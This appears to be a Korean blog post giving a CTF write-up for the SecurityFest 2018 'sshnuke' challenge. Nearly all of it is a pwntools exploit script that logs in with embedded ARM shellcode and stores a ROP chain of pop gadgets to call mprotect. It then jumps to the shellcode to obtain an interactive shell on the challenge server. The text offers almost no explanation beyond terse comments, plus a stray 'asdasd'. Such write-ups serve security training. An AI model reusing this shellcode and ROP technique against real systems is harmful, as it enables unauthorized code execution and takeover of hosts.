Write-up

[SECURITYFEST 2018] sshnuke writeup

ch4rli3kop 2018. 6. 3. 22:54
반응형



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import *
 
#r = remote("0.0.0.0", 5555)
= remote("pwn2.trinity.neo.ctf.rocks",31337)
#context.log_level = 'debug'
 
 
def login(r,shellcode):
    r.sendlineafter("Login: ", shellcode)
 
def store(r,index, data):
    r.sendlineafter("Select storage slot: "str(index))
    r.sendlineafter("Data for storage: ", data)
    r.sendlineafter("Store more? (y/n): ""y")
 
shellcode = 'hp\x00\xe3AqD\xe3\x04p-\xe5/\x7f\x02\xe3/sG\xe3\x04p-\xe5/r\x06\xe3i~F\xe3\x04p-\xe5\r\x00\xa0\xe1sx\x06\xe3\x04p-\xe5\x0c\xc0,\xe0\x04\xc0-\xe5\x04\x10\xa0\xe3\r\x10\x81\xe0\x01\xc0\xa0\xe1\x04\xc0-\xe5\r\x10\xa0\xe1\x02 "\xe0\x0bp\xa0\xe3\x00\x00\x00\xef'
 
shellcode_addr = '4AGgG3'
 
#0x00034cad : pop {r1, r2, r3, r4, r5, r6, pc}  WhqByt
#0x0006ef8c : pop {r0, pc}   Swqbl4 
#0x00061dfd : pop {r0, r1, r2, r7, pc}
#00547D0     call mprot
#0x00010450 : pop {r4, pc}  HsB1T0
popr0 = "Swqbl4"
popr1r2r6 = "WhqByt"
#pop = "YMQVYd"
 
mprotect_r0 = "3eMZYA"
mprotect_r1 = "Ml2N17"
mprotect_r2 = "JHKoU3"
 
call_mprot = "dyqkXm"
 
raw_input(">>")
login(r,shellcode)
 
r.sendlineafter("@RRF-CONTROL> ","1")
 
store(r,14, popr0)
store(r,15, mprotect_r0)
store(r,16, popr1r2r6)
store(r,17, mprotect_r1)
store(r,18, mprotect_r2)
store(r,19"AAAA")#3
store(r, 20, shellcode_addr)#4
store(r,21"AAAA")#5
store(r,22"AAAA")#6
store(r,23, call_mprot)
store(r, 24"AAAA")
store(r, 25,shellcode_addr)
 
raw_input(">>")
 
r.interactive()
 
 
 
#shellcraft.sh()
#asm(shellcraft.sh())
 
#context.arch = 'amd64'
 
 
 
#mprotect(address, size, prot)
        # 0x99000    0x1000     0x7
 
#pc = login
 
#mprotect dmf lrfh flxjsgka
 
#pc = call mprotect
 
cs


asdasd



반응형

'Write-up' 카테고리의 다른 글

[InCTF 2018] writeup  (0) 2018.10.16
[CSAW 2018] writeup  (0) 2018.09.21
[SECURITYFEST 2018] zion writeup  (0) 2018.06.03
[SECURITYFEST 2018] Mr.reagan  (0) 2018.06.03
[SECURITYFEST 2018] everywhere writeup  (0) 2018.06.03